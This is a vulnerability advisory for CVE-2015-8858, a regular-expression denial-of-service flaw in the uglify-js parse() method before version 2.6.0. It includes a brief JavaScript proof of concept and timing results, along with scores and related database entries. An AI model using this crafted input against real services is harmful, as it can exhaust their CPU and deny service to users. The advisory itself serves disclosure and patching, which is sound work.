GHSA-c9f4-xj24-8jqx

Опубликовано: 24 окт. 2017

Источник: github

Github: Прошло ревью

CVSS3: 7.5

Описание

Regular Expression Denial of Service in uglify-js

Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.

Proof of Concept

var u = require('uglify-js'); var genstr = function (len, chr) { var result = ""; for (i=0; i<=len; i++) { result = result + chr; } return result; } u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");

Results

$ time node test.js 10000 real 0m1.091s user 0m1.047s sys 0m0.039s $ time node test.js 80000 real 0m6.486s user 0m6.229s sys 0m0.094s

Recommendation

Update to version 2.6.0 or later.

Ссылки

Пакеты

Наименование

uglify-js

npm

Затронутые версииВерсия исправления

< 2.6.0

2.6.0

EPSS

Процентиль: 75%

0.00902

Низкий

7.5 High

CVSS3

CVE ID

CVE-2015-8858

Дефекты

CWE-1333

Связанные уязвимости

CVE-2015-8858

CVSS3: 7.5

ubuntu

около 9 лет назад

The uglify-js package before 2.6.0 for Node.js allows attackers to cause a denial of service (CPU consumption) via crafted input in a parse call, aka a "regular expression denial of service (ReDoS)."

CVE-2015-8858

CVSS3: 7.5

nvd

около 9 лет назад

The uglify-js package before 2.6.0 for Node.js allows attackers to cause a denial of service (CPU consumption) via crafted input in a parse call, aka a "regular expression denial of service (ReDoS)."

CVE-2015-8858

CVSS3: 7.5

debian

около 9 лет назад

The uglify-js package before 2.6.0 for Node.js allows attackers to cau ...

BDU:2021-02855

CVSS3: 7.5

fstec

больше 4 лет назад

Уязвимость библиотеки uglify-js прикладного программного обеспечения Аврора Центр, связанная с неконтролируемым расходом ресурсов, позволяющая нарушителю вызвать отказ в обслуживании

EPSS

Процентиль: 75%

0.00902

Низкий

7.5 High

CVSS3

CVE ID

CVE-2015-8858

Дефекты

CWE-1333